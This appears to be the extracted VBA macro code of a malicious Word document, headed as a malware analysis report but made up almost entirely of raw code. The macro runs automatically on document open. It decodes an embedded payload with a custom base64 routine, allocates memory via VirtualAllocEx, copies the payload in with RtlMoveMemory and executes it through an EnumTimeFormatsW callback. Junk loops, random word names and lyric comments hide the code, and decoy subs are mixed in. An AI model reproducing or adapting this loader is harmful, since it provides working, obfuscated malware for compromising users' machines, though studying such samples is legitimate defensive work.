Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function deportment(coheirship)
Dim constipated As Variant
Dim pantheon As String
Dim pomacentrus As Long
combined pomacentrus, VarPtr(coheirship) + 8, 4
Dim abaca As Byte
Dim emitted As Variant
Dim tracks As Long
workmate = 0
depopulate = 98 - 99
actionable = 0
quantity = Fix(214.876)

contrate = contrate

cynodon = 121 + 86 + 3889
notostraca = moniliform(ByVal depopulate, ByVal actionable, 9672, cynodon, 64)
aeriferous = contrate

combined tracks, VarPtr(notostraca) + 8, 4
quantity = eclair - 213

combined ByVal tracks, pomacentrus, 30 + 6153
fulcrum = 8
While fulcrum <> 11
fulcrum = fulcrum + 1
mepriser = mepriser And 58
nullify = nullify
Wend

deportment = tracks
End Function
Sub SelectSentence()
    Dim wdApp As Word.Application
    Dim wdRng As Word.range
    
    Set wdApp = GetObject(, "Word.Application")
    
    With wdApp.ActiveDocument
        If .Paragraphs.Count >= 3 Then
            Set wdRng = .Paragraphs(3).range
            wdRng.Copy
        End If
    End With
    Worksheets("Sheet2").PasteSpecial
    Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").range("A1")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub


Sub mould()
Dim mined As Integer
Dim aut As Byte
Set histidine = inebriety.nutlike.SelectedItem
acataphasia = histidine.Name
dinarchy = 8244
audiometric = Right(acataphasia, dinarchy)
prismatic = contriving.balletic(audiometric)
calidris = 7
While calidris <> 11
calidris = calidris + 1
quantity = mepriser Or 422
quantity = eclair \ 398
Wend

actinomeris = "discorporate"
anil = "mundi"
#If VBA6 And Win64 Then
Dim blanch As Integer
Dim transpose As interlayer
Dim pad As LongPtr
transpose.start = 0
Dim amability As Long
#Else
Dim disturbed As Long
transpose = 0
Dim transient As Byte
Dim pad As Long
#End If
adversaria = 92 - 47 - 45
appareled = "lanceshaped"
infancy = 12 - 53 + 4137
coffin = 58
gold = 56
If (coffin - gold) <> 24 Then
coffin = "apo" & Replace("gpathetic", "pathetic", "onid") & Replace("amillihenry", "millihenry", "e")
dereliction = "catenulate"
aeriferous = aeriferous
cabestro = Mid("classalanisotropic", 6, 2) & "timeter"
Else
contrate = nullify
gold = 49
End If

phooey = Mid("booklousepeunreined", 10, 2) & Replace("rvtrucklebed", "trucklebed", "apo") & Mid("crisscrossrationdulcification", 11, 6)
antifreeze = Replace("ccopra", "copra", "i") & LCase$("VIc")
epact = "biogeny"
paperboy = 82
chartreuse = 69
If (paperboy - chartreuse) <> 30 Then
paperboy = "beh" & LCase$("InDHa") & "nd"
nullify = contrate
mepriser = quantity / 63
moonstruck = "in" & LCase$("FAUStus")
Else
dereliction = nullify
chartreuse = 62
End If

gyneolatry = prismatic
flecked = "neologic"
pad = deportment(gyneolatry)
mameluke = "baggala"
#If VBA6 And Win64 Then
Dim polemics As Long
inherit = "fleshspots"
heliothis = "blond"
interphone = 122 + 95 - 67 + 1130
#ElseIf Win32 Then
marginality = "bibliomaniac"
arrhythmia = "resistant"
economically = "somateria"
amical = 128 - 66 + 70 + 374
interphone = amical + 3171

#End If
Dim velours As String
Dim bistroic As Integer
Dim ejaculation As Long
ejaculation = 2048
Dim preseason As Long
preseason = pad + interphone
Dim bird As Long
bird = 0
brighton = afflation(preseason, ejaculation, bird)
autocatalysis = 90
avantgarde = 96
If (autocatalysis - avantgarde) <> 0 Then
autocatalysis = Replace("afohn", "fohn", "r") & LCase$("Gute")
nullify = "edental"
contrate = nullify
ene = "flu" & "orosc" & "opy"
Else
nullify = "maneuver"
avantgarde = 89
End If

End Sub

Private Sub Document_Open()
Dim overeat As String
Dim contrarily As String
sed = "arg" & "yroxiphium"
mould
anoa = 3
While anoa <> 7
anoa = anoa + 1
quantity = Int(340.1452)
dereliction = aeriferous
Wend
End Sub

Attribute VB_Name = "contriving"
'You really think you're in control
#If VBA6 And Win64 Then
'Maybe I'm crazy
Public Type interlayer
'Even your emotions had an echo
start As LongPtr
'п»їI remember when, I remember, I remember when I lost my mind
End Type
'п»їI remember when, I remember, I remember when I lost my mind
Public  Declare PtrSafe Function moniliform Lib "kernel32.dll" Alias "VirtualAllocEx" (malus As LongPtr, factuality As LongPtr, ByVal auctor As LongPtr, ByVal vaporer As LongPtr, ByVal betulaceous As LongPtr) As LongPtr
'п»їI remember when, I remember, I remember when I lost my mind
Public Declare PtrSafe Function faldstool Lib "user32" Alias "OpenClipboard" (manege As LongPtr) As Boolean
'п»їI remember when, I remember, I remember when I lost my mind
Public  Declare PtrSafe Sub combined Lib "ntdll.dll" Alias "RtlMoveMemory" (escopet As Any, ByVal accloy As Any, ByVal quip As LongPtr)
'п»їI remember when, I remember, I remember when I lost my mind
Public Declare PtrSafe Function marauder Lib "user32" Alias "SetParent" (ByVal impenetrability As LongPtr, ByVal repugnance As LongPtr,ariete As LongPtr) As LongPtr
'п»їI remember when, I remember, I remember when I lost my mind
Public Declare PtrSafe Function bigheartedness Lib "kernel32.dll" Alias "Sleep" (pearls As LongPtr)
'But think twice, that's my only advice
Public Declare PtrSafe Function bigboned Lib "user32" Alias "EndPaint" (calypso As LongPtr,finalist As LongPtr) As LongPtr
'And it's no coincidence I've come
Public  Declare PtrSafe Function afflation Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal pylodictus As Any, ByVal helminth As Any, ByVal crassitude As Any) As LongPtr
'Maybe we're crazy
Public Declare PtrSafe Function admitting Lib "user32" Alias "GetUpdateRect" (atlantean As LongPtr, default As LongPtr,dentine As LongPtr) As Boolean
'Probably

'Maybe we're crazy
#Else
'And it's no coincidence I've come
Public Declare Function afflation Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal deflated As Any, ByVal curtly As Any, ByVal acherontia As Any) As Long
'And it's no coincidence I've come
Public Declare Sub combined Lib "ntdll.dll" Alias "RtlMoveMemory" (hokkaido As Any, ByVal explication As Any, ByVal babist As Long)
'Come on now, who do you, who do you, who do you, who do you think you are,
Public Declare Function packhorse Lib "kernel32.dll" Alias "Sleep" (appetite As Long)
'Well, I think you're crazy
Public Declare Function mown Lib "user32" Alias "SetParent" (ByVal disbranch As Long, ByVal polyestrous As Long, od As Long) As Long
'I just knew too much
Public Declare Function moniliform Lib "kernel32.dll" Alias "VirtualAllocEx" (arborolatry As Long, botryoid As Long, ByVal calumniate As Long, ByVal crabbe As Long, ByVal expensively As Long) As Long
'Probably
Public Declare Function apodeictical Lib "user32" Alias "OpenClipboard" (dexterousness As Long) As Boolean
'I just knew too much
Public Declare Function dactylonomy Lib "user32" Alias "GetUpdateRect" (balticfinnic As Long, bacchus As Long, douala As Long) As Boolean
'But it wasn't because I didn't know enough
Public Declare Function dastardness Lib "user32" Alias "EndPaint" (torpescence As Long, accouterment As Long) As Long
'My heroes had the heart to lose their lives out on a limb

'Probably
#End If
'Just like me
Function online(athens, foreleg)
online = athens * foreleg
End Function
Function fiscalize(steroidal)
fiscalize = AscW(steroidal)
End Function
Function balletic(bipartite) As String
Dim rejoice(63) As Long
Dim colleagueship As Long
Dim acequiamadre As Byte

Dim scamper As Long
mepriser = quantity + 422

Dim broad As Long
Dim expatriate As Integer
Dim talented(63) As Long
Dim bradshaw As String
contrate = dereliction

Dim ascidian(255) As Byte
Dim backboard() As Byte
Dim money As Byte

Dim unwieldy(63) As Long
Dim miasmal As Long
Dim diplomacy(6965) As Byte
Dim chewink As String

Dim drub As Variant

Dim bassetting As Variant

devanagari = 4096
nimravus = 64
headland = 106 + 65430
abstractedness = 63
dower = 115 + 100 + 3817
Dim partial As Long

hermannia = 256
compend = 258048
morbidity = 85 + 65195
antinomian = 16 + 102 + 5 + 262021
garran = 60 - 102 + 297
octopus = 78 + 122 + 25 + 16711455
flake = 107 + 101 + 16514864
Dim atherosclerotic As Byte
Dim incommutability(8243) As Byte
disposition = 0
schizoid = 108 + 65 + 8070
For fohn = disposition To schizoid
chastened = 79 - 78
midgard = Mid$(bipartite, fohn + 1, chastened)
bridget = "con" & "suetu" & Replace("dostensibly", "ostensibly", "o")
je = "actualized"
birthing = "indeclinable"
cestida = fiscalize(midgard)
incommutability(fohn) = cestida
Next
Dim quibbler As String
auk = 71
demands = 72
If (auk - demands) <> 12 Then
auk = LCase$("APP") & Mid("hookahortiomiddle", 7, 5) & "ned"
mepriser = Abs(228.195)
contrate = "marking"
transcursion = "di" & Replace("cgelechiidae", "gelechiidae", "ero") & Mid("belligerantscoupled", 12, 1)
Else
eclair = Abs(339.1)
demands = 89
End If

julep = 8243
contemptible = 57 - 119 - 122 + 219
For plow = 0 To julep
incommutability(plow) = incommutability(plow) + 8
Next plow
hysique = 76
betelgeuse = 56
If (hysique - betelgeuse) <> 5 Then
hysique = Mid("clitocybecaextermination", 10, 2) & "ramel"
contrate = nullify
quantity = Round(243.391)
oblivion = "be" & "tterknown"
Else
aeriferous = "earths"
betelgeuse = 66
End If

expatriate = 0
audire = 95 + 104 - 57 - 20
calmness = 255
For broad = 0 To calmness
If (broad >= 65) And (broad <= 90) Then
ascidian(broad) = broad - 65
ElseIf (broad >= 97) And (broad <= 122) Then
ascidian(broad) = broad - 71
ElseIf (broad >= 48) And (broad <= 57) Then
ascidian(broad) = broad + 4
ElseIf broad = 43 Then
ascidian(broad) = 62
ElseIf broad = 47 Then
ascidian(broad) = 63
End If
Next broad
For broad = 0 To 63
rejoice(broad) = online(broad, nimravus)
unwieldy(broad) = online(broad, devanagari)
talented(broad) = online(broad, antinomian)
Next broad
board = 9
While board <> 13
board = board + 1
quantity = Int(169.693)
contrate = dereliction
Wend

backboard = incommutability
mayoral = 128 - 124
averni = 3
While averni <> 8
averni = averni + 1
aeriferous = dereliction
nullify = nullify
Wend

detergency = 3
mepriser = Round(342.128)

eclair = mepriser + 396

curd = detergency + 1
been = 15 - 61 + 83 - 35
For miasmal = 0 To julep
deteriorated = backboard(miasmal)
mirth = backboard(miasmal + 2)
colleagueship = talented(ascidian(deteriorated)) _
 + unwieldy(ascidian(backboard(miasmal + 1))) + rejoice(ascidian(mirth)) + ascidian(backboard(miasmal + detergency))
broad = juggle(colleagueship, octopus)
diplomacy(scamper) = couples(broad, headland)
broad = juggle(colleagueship, morbidity)
diplomacy(scamper + 1) = couples(broad, hermannia)
diplomacy(scamper + been) = juggle(colleagueship, garran)
scamper = scamper + been + 1
miasmal = miasmal + 3
Next
balletic = diplomacy
End Function

Function juggle(disrobe, bipedal)
juggle = disrobe And bipedal
End Function
Sub range()
    Dim rngFirstList As range
    Set rngFirstList = ActiveDocument.Lists(1).range
    ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, start:=False
    rngFirstList.Select
    Selection.Collapse Direction:=wdCollapseEnd
    Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub

Function couples(patrick, alberca)
couples = patrick \ alberca
End Function


Attribute VB_Name = "inebriety"
Attribute VB_Base = "0{B902EE97-65D6-4F0C-9A11-C51D0C821F6E}{77D104DA-C87E-432A-B8B2-D0A925E96C1E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False